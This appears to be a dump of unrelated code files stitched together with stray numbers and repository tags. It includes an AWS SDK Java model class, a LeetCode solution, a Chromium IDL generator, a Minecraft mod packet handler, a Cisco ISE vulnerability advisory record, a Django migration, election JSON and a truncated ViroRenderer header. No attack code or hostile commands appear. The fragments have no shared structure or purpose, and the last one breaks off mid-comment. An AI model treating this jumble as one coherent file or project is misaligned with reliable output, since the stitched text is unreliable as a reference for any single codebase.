LambdaAuthorizerConfig implements Serializable, Cloneable, StructuredPojo { /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 disables * caching of responses. * </p> */ private Integer authorizerResultTtlInSeconds; /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When configuring * Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> */ private String authorizerUri; /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> */ private String identityValidationExpression; /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 disables * caching of responses. * </p> * * @param authorizerResultTtlInSeconds * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 * disables caching of responses. */ public void setAuthorizerResultTtlInSeconds(Integer authorizerResultTtlInSeconds) { this.authorizerResultTtlInSeconds = authorizerResultTtlInSeconds; } /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 disables * caching of responses. * </p> * * @return The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 * disables caching of responses. */ public Integer getAuthorizerResultTtlInSeconds() { return this.authorizerResultTtlInSeconds; } /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 disables * caching of responses. * </p> * * @param authorizerResultTtlInSeconds * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 * disables caching of responses. * @return Returns a reference to this object so that method calls can be chained together. */ public LambdaAuthorizerConfig withAuthorizerResultTtlInSeconds(Integer authorizerResultTtlInSeconds) { setAuthorizerResultTtlInSeconds(authorizerResultTtlInSeconds); return this; } /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When configuring * Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> * * @param authorizerUri * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a * version ARN (<code>.../v3</code>) or alias ARN. </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When * configuring Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services * CLI, run the following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> */ public void setAuthorizerUri(String authorizerUri) { this.authorizerUri = authorizerUri; } /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When configuring * Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> * * @return The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a * version ARN (<code>.../v3</code>) or alias ARN. </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When * configuring Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web * Services CLI, run the following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> */ public String getAuthorizerUri() { return this.authorizerUri; } /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When configuring * Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> * * @param authorizerUri * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a * version ARN (<code>.../v3</code>) or alias ARN. </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When * configuring Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services * CLI, run the following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * @return Returns a reference to this object so that method calls can be chained together. */ public LambdaAuthorizerConfig withAuthorizerUri(String authorizerUri) { setAuthorizerUri(authorizerUri); return this; } /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> * * @param identityValidationExpression * A regular expression for validation of tokens before the Lambda function is called. */ public void setIdentityValidationExpression(String identityValidationExpression) { this.identityValidationExpression = identityValidationExpression; } /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> * * @return A regular expression for validation of tokens before the Lambda function is called. */ public String getIdentityValidationExpression() { return this.identityValidationExpression; } /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> * * @param identityValidationExpression * A regular expression for validation of tokens before the Lambda function is called. * @return Returns a reference to this object so that method calls can be chained together. */ public LambdaAuthorizerConfig withIdentityValidationExpression(String identityValidationExpression) { setIdentityValidationExpression(identityValidationExpression); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getAuthorizerResultTtlInSeconds() != null) sb.append("AuthorizerResultTtlInSeconds: ").append(getAuthorizerResultTtlInSeconds()).append(","); if (getAuthorizerUri() != null) sb.append("AuthorizerUri: ").append(getAuthorizerUri()).append(","); if (getIdentityValidationExpression() != null) sb.append("IdentityValidationExpression: ").append(getIdentityValidationExpression()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof LambdaAuthorizerConfig == false) return false; LambdaAuthorizerConfig other = (LambdaAuthorizerConfig) obj; if (other.getAuthorizerResultTtlInSeconds() == null ^ this.getAuthorizerResultTtlInSeconds() == null) return false; if (other.getAuthorizerResultTtlInSeconds() != null && other.getAuthorizerResultTtlInSeconds().equals(this.getAuthorizerResultTtlInSeconds()) == false) return false; if (other.getAuthorizerUri() == null ^ this.getAuthorizerUri() == null) return false; if (other.getAuthorizerUri() != null && other.getAuthorizerUri().equals(this.getAuthorizerUri()) == false) return false; if (other.getIdentityValidationExpression() == null ^ this.getIdentityValidationExpression() == null) return false; if (other.getIdentityValidationExpression() != null && other.getIdentityValidationExpression().equals(this.getIdentityValidationExpression()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getAuthorizerResultTtlInSeconds() == null) ? 0 : getAuthorizerResultTtlInSeconds().hashCode()); hashCode = prime * hashCode + ((getAuthorizerUri() == null) ? 0 : getAuthorizerUri().hashCode()); hashCode = prime * hashCode + ((getIdentityValidationExpression() == null) ? 0 : getIdentityValidationExpression().hashCode()); return hashCode; } @Override public LambdaAuthorizerConfig clone() { try { return (LambdaAuthorizerConfig) super.clone(); } catch (CloneNotSupportedException e) { throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e); } } @com.amazonaws.annotation.SdkInternalApi @Override public void marshall(ProtocolMarshaller protocolMarshaller) { com.amazonaws.services.appsync.model.transform.LambdaAuthorizerConfigMarshaller.getInstance().marshall(this, protocolMarshaller); } }
5,298
3,269
<filename>Algo and DSA/LeetCode-Solutions-master/Python/next-palindrome-using-same-digits.py # Time: O(n) # Space: O(1) class Solution(object): def nextPalindrome(self, num): """ :type num: str :rtype: str """ def next_permutation(nums, begin, end): def reverse(nums, begin, end): left, right = begin, end-1 while left < right: nums[left], nums[right] = nums[right], nums[left] left += 1 right -= 1 k, l = begin-1, begin for i in reversed(xrange(begin, end-1)): if nums[i] < nums[i+1]: k = i break else: reverse(nums, begin, end) return False for i in reversed(xrange(k+1, end)): if nums[i] > nums[k]: l = i break nums[k], nums[l] = nums[l], nums[k] reverse(nums, k+1, end) return True nums = list(num) if not next_permutation(nums, 0, len(nums)//2): return "" for i in xrange(len(nums)//2): nums[-1-i] = nums[i] return "".join(nums)
771
2,151
<gh_stars>1000+ #!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import sys from idl_log import ErrOut, InfoOut, WarnOut from idl_option import GetOption, Option, ParseOptions from idl_parser import ParseFiles GeneratorList = [] Option('out', 'List of output files', default='') Option('release', 'Which release to generate.', default='') Option('range', 'Which ranges in the form of MIN,MAX.', default='start,end') class Generator(object): """Base class for generators. This class provides a mechanism for adding new generator objects to the IDL driver. To use this class override the GenerateRelease and GenerateRange members, and instantiate one copy of the class in the same module which defines it to register the generator. After the AST is generated, call the static Run member which will check every registered generator to see which ones have been enabled through command-line options. To enable a generator use the switches: --<sname> : To enable with defaults --<sname>_opt=<XXX,YYY=y> : To enable with generator specific options. NOTE: Generators still have access to global options """ def __init__(self, name, sname, desc): self.name = name self.run_switch = Option(sname, desc) self.opt_switch = Option(sname + '_opt', 'Options for %s.' % sname, default='') GeneratorList.append(self) self.errors = 0 self.skip_list = [] def Error(self, msg): ErrOut.Log('Error %s : %s' % (self.name, msg)) self.errors += 1 def GetRunOptions(self): options = {} option_list = self.opt_switch.Get() if option_list: option_list = option_list.split(',') for opt in option_list: offs = opt.find('=') if offs > 0: options[opt[:offs]] = opt[offs+1:] else: options[opt] = True return options if self.run_switch.Get(): return options return None def Generate(self, ast, options): self.errors = 0 rangestr = GetOption('range') releasestr = GetOption('release') print "Found releases: %s" % ast.releases # Generate list of files to ignore due to errors for filenode in ast.GetListOf('File'): # If this file has errors, skip it if filenode.GetProperty('ERRORS') > 0: self.skip_list.append(filenode) continue # Check for a range option which over-rides a release option if not releasestr and rangestr: range_list = rangestr.split(',') if len(range_list) != 2: self.Error('Failed to generate for %s, incorrect range: "%s"' % (self.name, rangestr)) else: vmin = range_list[0] vmax = range_list[1] # Generate 'start' and 'end' represent first and last found. if vmin == 'start': vmin = ast.releases[0] if vmax == 'end': vmax = ast.releases[-1] vmin = ast.releases.index(vmin) vmax = ast.releases.index(vmax) + 1 releases = ast.releases[vmin:vmax] InfoOut.Log('Generate range %s of %s.' % (rangestr, self.name)) ret = self.GenerateRange(ast, releases, options) if ret < 0: self.Error('Failed to generate range %s : %s.' %(vmin, vmax)) else: InfoOut.Log('%s wrote %d files.' % (self.name, ret)) # Otherwise this should be a single release generation else: if releasestr == 'start': releasestr = ast.releases[0] if releasestr == 'end': releasestr = ast.releases[-1] if releasestr > ast.releases[-1]: InfoOut.Log('There is no unique release for %s, using last release.' % releasestr) releasestr = ast.releases[-1] if releasestr not in ast.releases: self.Error('Release %s not in [%s].' % (releasestr, ', '.join(ast.releases))) if releasestr: InfoOut.Log('Generate release %s of %s.' % (releasestr, self.name)) ret = self.GenerateRelease(ast, releasestr, options) if ret < 0: self.Error('Failed to generate release %s.' % releasestr) else: InfoOut.Log('%s wrote %d files.' % (self.name, ret)) else: self.Error('No range or release specified for %s.' % releasestr) return self.errors def GenerateRelease(self, ast, release, options): __pychecker__ = 'unusednames=ast,release,options' self.Error("Undefined release generator.") return 0 def GenerateRange(self, ast, releases, options): __pychecker__ = 'unusednames=ast,releases,options' self.Error("Undefined range generator.") return 0 @staticmethod def Run(ast): fail_count = 0 # Check all registered generators if they should run. for gen in GeneratorList: options = gen.GetRunOptions() if options is not None: if gen.Generate(ast, options): fail_count += 1 return fail_count class GeneratorByFile(Generator): """A simplified generator that generates one output file per IDL source file. A subclass of Generator for use of generators which have a one to one mapping between IDL sources and output files. Derived classes should define GenerateFile. """ def GenerateFile(self, filenode, releases, options): """Generates an output file from the IDL source. Returns true if the generated file is different than the previously generated file. """ __pychecker__ = 'unusednames=filenode,releases,options' self.Error("Undefined release generator.") return 0 def GenerateRelease(self, ast, release, options): return self.GenerateRange(ast, [release], options) def GenerateRange(self, ast, releases, options): # Get list of out files outlist = GetOption('out') if outlist: outlist = outlist.split(',') skipList = [] cnt = 0 for filenode in ast.GetListOf('File'): # Ignore files with errors if filenode in self.skip_list: continue # Skip this file if not required if outlist and filenode.GetName() not in outlist: continue # Create the output file and increment out count if there was a delta if self.GenerateFile(filenode, releases, options): cnt = cnt + 1 for filenode in skipList: errcnt = filenode.GetProperty('ERRORS') ErrOut.Log('%s : Skipped because of %d errors.' % ( filenode.GetName(), errcnt)) if skipList: return -len(skipList) if GetOption('diff'): return -cnt return cnt check_release = 0 check_range = 0 class GeneratorReleaseTest(Generator): def GenerateRelease(self, ast, release, options = {}): __pychecker__ = 'unusednames=ast,release,options' global check_release check_map = { 'so_long': True, 'MyOpt': 'XYZ', 'goodbye': True } check_release = 1 for item in check_map: check_item = check_map[item] option_item = options.get(item, None) if check_item != option_item: print 'Option %s is %s, expecting %s' % (item, option_item, check_item) check_release = 0 if release != 'M14': check_release = 0 return check_release == 1 def GenerateRange(self, ast, releases, options): __pychecker__ = 'unusednames=ast,releases,options' global check_range check_range = 1 return True def Test(): __pychecker__ = 'unusednames=args' global check_release global check_range ParseOptions(['--testgen_opt=so_long,MyOpt=XYZ,goodbye']) if Generator.Run('AST') != 0: print 'Generate release: Failed.\n' return -1 if check_release != 1 or check_range != 0: print 'Gererate release: Failed to run.\n' return -1 check_release = 0 ParseOptions(['--testgen_opt="HELLO"', '--range=M14,M16']) if Generator.Run('AST') != 0: print 'Generate range: Failed.\n' return -1 if check_release != 0 or check_range != 1: print 'Gererate range: Failed to run.\n' return -1 print 'Generator test: Pass' return 0 def Main(args): if not args: return Test() filenames = ParseOptions(args) ast = ParseFiles(filenames) return Generator.Run(ast) if __name__ == '__main__': GeneratorReleaseTest('Test Gen', 'testgen', 'Generator Class Test.') sys.exit(Main(sys.argv[1:]))
3,257
721
package crazypants.enderio.machines.machine.teleport.packet; import com.enderio.core.common.util.NullHelper; import crazypants.enderio.api.teleport.IItemOfTravel; import io.netty.buffer.ByteBuf; import net.minecraft.entity.player.EntityPlayer; import net.minecraft.item.ItemStack; import net.minecraft.util.EnumHand; import net.minecraftforge.fml.common.network.simpleimpl.IMessage; import net.minecraftforge.fml.common.network.simpleimpl.IMessageHandler; import net.minecraftforge.fml.common.network.simpleimpl.MessageContext; public class PacketDrainStaff implements IMessage { int powerUse; int hand; public PacketDrainStaff() { } public PacketDrainStaff(int powerUse, EnumHand hand) { this.powerUse = powerUse; this.hand = hand.ordinal(); } @Override public void toBytes(ByteBuf buf) { buf.writeInt(powerUse); buf.writeInt(hand); } @Override public void fromBytes(ByteBuf buffer) { powerUse = buffer.readInt(); hand = buffer.readInt(); } public static class Handler implements IMessageHandler<PacketDrainStaff, IMessage> { @Override public IMessage onMessage(PacketDrainStaff message, MessageContext ctx) { EntityPlayer ep = ctx.getServerHandler().player; EnumHand theHand = NullHelper.notnullJ(EnumHand.values()[message.hand], "EnumHand value is null!"); ItemStack heldItemMainhand = ep.getHeldItem(theHand); if (message.powerUse > 0 && !heldItemMainhand.isEmpty() && heldItemMainhand.getItem() instanceof IItemOfTravel) { ItemStack item = heldItemMainhand.copy(); ((IItemOfTravel) item.getItem()).extractInternal(item, message.powerUse); ep.setHeldItem(theHand, item); } return null; } } }
604
892
<reponame>github/advisory-database<filename>advisories/unreviewed/2022/05/GHSA-jj77-9jr7-4mpq/GHSA-jj77-9jr7-4mpq.json { "schema_version": "1.2.0", "id": "GHSA-jj77-9jr7-4mpq", "modified": "2022-05-13T01:35:41Z", "published": "2022-05-13T01:35:41Z", "aliases": [ "CVE-2018-0187" ], "details": "A vulnerability in the Admin portal of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain confidential information for privileged accounts. The vulnerability is due to the improper handling of confidential information. An attacker could exploit this vulnerability by logging into the web interface on a vulnerable system. An exploit could allow an attacker to obtain confidential information for privileged accounts. This information could then be used to impersonate or negatively impact the privileged account on the affected system.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0187" }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-ise-info-disclosure" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106717" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "severity": "MODERATE", "github_reviewed": false } }
598
575
// Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_CLOUD_DEVICES_COMMON_CLOUD_DEVICE_DESCRIPTION_H_ #define COMPONENTS_CLOUD_DEVICES_COMMON_CLOUD_DEVICE_DESCRIPTION_H_ #include <memory> #include <string> #include <vector> #include "base/macros.h" #include "base/strings/string_piece_forward.h" #include "base/values.h" namespace cloud_devices { // Provides parsing, serialization and validation Cloud Device Description or // Cloud Job Ticket. // https://developers.google.com/cloud-print/docs/cdd class CloudDeviceDescription { public: CloudDeviceDescription(); ~CloudDeviceDescription(); bool InitFromString(const std::string& json); bool InitFromValue(base::Value value); static bool IsValidTicket(const base::Value& value); std::string ToString() const; base::Value ToValue() &&; // Returns item of given type with capability/option. // Returns nullptr if missing. const base::Value* GetItem(const std::vector<base::StringPiece>& path, base::Value::Type type) const; // Creates item with given type for capability/option. // Returns nullptr if an intermediate Value in the path is not a dictionary. base::Value* CreateItem(const std::vector<base::StringPiece>& path, base::Value::Type type); private: base::Value root_; DISALLOW_COPY_AND_ASSIGN(CloudDeviceDescription); }; } // namespace cloud_devices #endif // COMPONENTS_CLOUD_DEVICES_COMMON_CLOUD_DEVICE_DESCRIPTION_H_
535
575
// Copyright 2017 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_BINDINGS_MODULES_V8_V8_CONTEXT_SNAPSHOT_EXTERNAL_REFERENCES_H_ #define THIRD_PARTY_BLINK_RENDERER_BINDINGS_MODULES_V8_V8_CONTEXT_SNAPSHOT_EXTERNAL_REFERENCES_H_ #include <cstdint> #include "third_party/blink/renderer/modules/modules_export.h" #include "third_party/blink/renderer/platform/wtf/allocator/allocator.h" namespace blink { // V8ContextSnapshotExternalReferences::GetTable() provides a table of pointers // of C++ callbacks exposed to V8. The table contains C++ callbacks for DOM // attribute getters, setters, DOM methods, wrapper type info etc. class MODULES_EXPORT V8ContextSnapshotExternalReferences { STATIC_ONLY(V8ContextSnapshotExternalReferences); public: // The definition of this method is auto-generated in // v8_context_snapshot_external_references.cc. static const intptr_t* GetTable(); }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_BINDINGS_MODULES_V8_V8_CONTEXT_SNAPSHOT_EXTERNAL_REFERENCES_H_
406
517
/* * Copyright (c) 2008. All rights reserved. */ package ro.isdc.wro.extensions.processor; import java.io.File; import java.io.IOException; import java.net.URL; import org.junit.Test; import ro.isdc.wro.extensions.processor.js.DojoShrinksafeCompressorProcessor; import ro.isdc.wro.model.resource.ResourceType; import ro.isdc.wro.model.resource.processor.ResourcePostProcessor; import ro.isdc.wro.util.WroTestUtils; /** * Test Dojo Shrinksafe compressor processor. * * @author <NAME> * @created Created on Nov 6, 2010 */ public class TestDojoShrinksafeCompressorProcessor { @Test public void testFromFolder() throws IOException { final ResourcePostProcessor processor = new DojoShrinksafeCompressorProcessor(); final URL url = getClass().getResource("dojo"); final File testFolder = new File(ClassLoader.getSystemResource("test").getFile()); final File expectedFolder = new File(url.getFile(), "expected"); WroTestUtils.compareFromDifferentFoldersByExtension(testFolder, expectedFolder, "js", processor); } @Test public void shouldSupportCorrectResourceTypes() { WroTestUtils.assertProcessorSupportResourceTypes(new DojoShrinksafeCompressorProcessor(), ResourceType.JS); } }
395
852
<reponame>ckamtsikis/cmssw #include "CalibFormats/SiPixelObjects/interface/PixelFEDParameters.h" #include <ostream> using namespace pos; PixelFEDParameters::PixelFEDParameters() { fednumber_ = 0; crate_ = 0; vmebaseaddress_ = 0; } PixelFEDParameters::~PixelFEDParameters() {} unsigned int PixelFEDParameters::getFEDNumber() const { return fednumber_; } unsigned int PixelFEDParameters::getCrate() const { return crate_; } unsigned int PixelFEDParameters::getVMEBaseAddress() const { return vmebaseaddress_; } void PixelFEDParameters::setFEDParameters(unsigned int fednumber, unsigned int crate, unsigned int vmebaseaddress) { fednumber_ = fednumber; crate_ = crate; vmebaseaddress_ = vmebaseaddress; } void PixelFEDParameters::setFEDNumber(unsigned int fednumber) { fednumber_ = fednumber; } void PixelFEDParameters::setCrate(unsigned int crate) { crate_ = crate; } void PixelFEDParameters::setVMEBaseAddress(unsigned int vmebaseaddress) { vmebaseaddress_ = vmebaseaddress; } std::ostream& pos::operator<<(std::ostream& s, const PixelFEDParameters& pFEDp) { s << "FED Number:" << pFEDp.fednumber_ << std::endl; s << "Crate Number:" << pFEDp.crate_ << std::endl; s << "VME Base Address:" << pFEDp.vmebaseaddress_ << std::endl; return s; }
430
348
<reponame>chamberone/Leaflet.PixiOverlay<filename>docs/data/leg-t1/041/04102084.json {"nom":"<NAME>","circ":"2ème circonscription","dpt":"Loir-et-Cher","inscrits":804,"abs":329,"votants":475,"blancs":2,"nuls":2,"exp":471,"res":[{"nuance":"LR","nom":"<NAME>","voix":200},{"nuance":"REM","nom":"<NAME>","voix":92},{"nuance":"FN","nom":"Mme <NAME>","voix":88},{"nuance":"FI","nom":"<NAME>","voix":41},{"nuance":"SOC","nom":"<NAME>","voix":23},{"nuance":"ECO","nom":"Mme <NAME>","voix":6},{"nuance":"DIV","nom":"<NAME>","voix":5},{"nuance":"COM","nom":"<NAME>","voix":4},{"nuance":"DVD","nom":"Mme <NAME>","voix":4},{"nuance":"DLF","nom":"Mme <NAME>","voix":4},{"nuance":"ECO","nom":"Mme <NAME>","voix":3},{"nuance":"EXG","nom":"Mme <NAME>","voix":1}]}
309
380
package org.gluu.oxauth.model.event; import javax.enterprise.util.AnnotationLiteral; import javax.inject.Qualifier; import java.lang.annotation.Documented; import java.lang.annotation.Retention; import java.lang.annotation.Target; import static java.lang.annotation.ElementType.*; import static java.lang.annotation.RetentionPolicy.RUNTIME; /** * @author <NAME> */ @Qualifier @Retention(RUNTIME) @Target({ METHOD, FIELD, PARAMETER, TYPE }) @Documented public @interface CryptoProviderEvent { final class Literal extends AnnotationLiteral<CryptoProviderEvent> implements CryptoProviderEvent { public static final CryptoProviderEvent.Literal INSTANCE = new CryptoProviderEvent.Literal(); private static final long serialVersionUID = 1L; } }
248
1,392
# Generated by Django 3.2.13 on 2022-04-29 09:47 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ("checkout", "0046_alter_checkout_line_pk"), ("warehouse", "0027_alter_reservation_models_checkout_line"), ] operations = [ migrations.AlterField( model_name="preorderreservation", name="checkout_line_token", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="checkout.checkoutline" ), ), migrations.AlterField( model_name="reservation", name="checkout_line_token", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="checkout.checkoutline" ), ), migrations.RemoveField( model_name="preorderreservation", name="checkout_line", ), migrations.RemoveField( model_name="reservation", name="checkout_line", ), migrations.RenameField( model_name="preorderreservation", old_name="checkout_line_token", new_name="checkout_line", ), migrations.RenameField( model_name="reservation", old_name="checkout_line_token", new_name="checkout_line", ), migrations.AlterField( model_name="preorderreservation", name="checkout_line", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="preorder_reservations", to="checkout.checkoutline", ), ), migrations.AlterField( model_name="reservation", name="checkout_line", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="reservations", to="checkout.checkoutline", ), ), ]
1,077
1,851
<reponame>yoelhawa/viro // // VRONode.h // ViroRenderer // // Created by <NAME> on 11/15/15. // Copyright © 2015 Viro Media. All rights reserved. // // Permission is hereby granted, free of charge, to any person obtaining // a copy of this software and associated documentation files (the // "Software"), to deal in the Software without restriction, including // without limitation the rights to use, copy, modify, merge, publish, // distribute, sublicense, and/or sell copies of the Software, and to // permit persons to whom the Software is furnished to do so, subject to // the following conditions: // // The above copyright notice and this permission notice shall be included // in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. // IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY // CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, // TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE // SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #ifndef VRONode_h #define VRONode_h #include <memory> #include <stack> #include <vector> #include <string> #include <set> #include <algorithm> #include <functional> #include "optional.hpp" #include "VROAtomic.h" #include "VROMatrix4f.h" #include "VROQuaternion.h" #include "VRORenderContext.h" #include "VRODriver.h" #include "VRORenderParameters.h" #include "VROAnimatable.h" #include "VROBoundingBox.h" #include "VROSortKey.h" #include "VROLog.h" #include "VROEventDelegate.h" #include "VROSound.h" #include "VROFrustumBoxIntersectionMetadata.h" #include "VROThreadRestricted.h" #include "VROPhysicsBody.h" class VROGeometry; class VROLight; class VROScene; class VROTaskQueue; class VROAction; class VROTexture; class VROPortal; class VROMorpher; class VRONodeCamera; class VROHitTestResult; class VROConstraint; class VROExecutableAnimation; class VROTransformDelegate; class VROTransaction; class VRORenderMetadata; class VROParticleEmitter; class VROSkeletalAnimationLayer; class VROSkinner; class VROIKRig; extern bool kDebugSortOrder; extern int kDebugSortOrderFrameFrequency; extern const std::string kDefaultNodeTag; enum class VRONodeType { Normal, Portal, PortalFrame, }; enum class VROSilhouetteMode { Flat, // Render silhouettes with constant lighting, no textures Textured, // Render silhouettes with constant lighting and textures }; enum class VRODragType { // Drags objects with a fixed distance to camera/controller/etc, from the point at which // the user has grabbed the geometry containing this draggable node. FixedDistance, // Drags objects with a fixed distance to camera/controller/etc, from the point of this // node's position in world space. FixedDistanceOrigin, // Drags object along a given plane (point + normal) FixedToPlane, // Currently available to AR only. Attempts to drag object w.r.t. the real world. FixedToWorld, }; class VRONode : public VROAnimatable, public VROThreadRestricted { public: static void resetDebugSortIndex(); #pragma mark - Initialization /* Default constructor. */ VRONode(); /* Copy constructor. This copies the node but *not* the underlying geometries or lights. Instead, these are shared by reference with the copied node. Additionally, this constructor will not copy child nodes. To copy child nodes recursively, invoke the clone() function. */ VRONode(const VRONode &node); virtual ~VRONode(); /* Delete any rendering resources. Invoked prior to destruction, on the rendering thread. Recurses down the tree. */ virtual void deleteGL(); /* Copy constructor that recursively copies all child nodes. This copies the node but *not* the underlying geometries or lights. Instead, these are shared by reference with the copied node. */ std::shared_ptr<VRONode> clone(); /* Get a unique ID for this VRONode. */ int getUniqueID() { return _uniqueID; } #pragma mark - Render Cycle /* Recursive function that recomputes the transforms of this node. This includes: _worldTransform, _worldRotation, _worldPosition, _worldBoundingBox */ void computeTransforms(VROMatrix4f parentTransform, VROMatrix4f parentRotation); /* Sets both the local position and rotation of this node in terms of world coordinates. A computeTransform pass is then performed to update the node's bounding boxes and as well as its child's node transforms recursively. The animated flag should be false in most cases because of the recursive computeTransform pass. */ void setWorldTransform(VROVector3f finalPosition, VROQuaternion finalRotation, bool animated = false); /* Update the visibility status of this node, using the camera in the current render context. This will update the _visible flag. Recurses to children. */ void updateVisibility(const VRORenderContext &context); /* Update the particle emitters attached to this node. Recurses to children. */ void updateParticles(const VRORenderContext &context); /* Recursively applies transformation constraints (e.g. billboarding) to this node and its children. */ void applyConstraints(const VRORenderContext &context, VROMatrix4f parentTransform, bool parentUpdated); /* Update the position of each light in this node, and add to the outLights vector. Recurses down the tree. */ void collectLights(std::vector<std::shared_ptr<VROLight>> *outLights); /* Recursively updates the sort keys of this node, preparing this node and its children for rendering. This method also computes non-transform-related parameters for each node (opacity, lights, etc.) that are required prior to render, and outputs metadata about the forthcoming render to VRORenderMetadata. Note: this method and getSortKeys() *only* apply to visible nodes. Invisible nodes are skipped. */ void updateSortKeys(uint32_t depth, VRORenderParameters &params, std::shared_ptr<VRORenderMetadata> &metadata, const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* Get the sort keys for all visible nodes in this 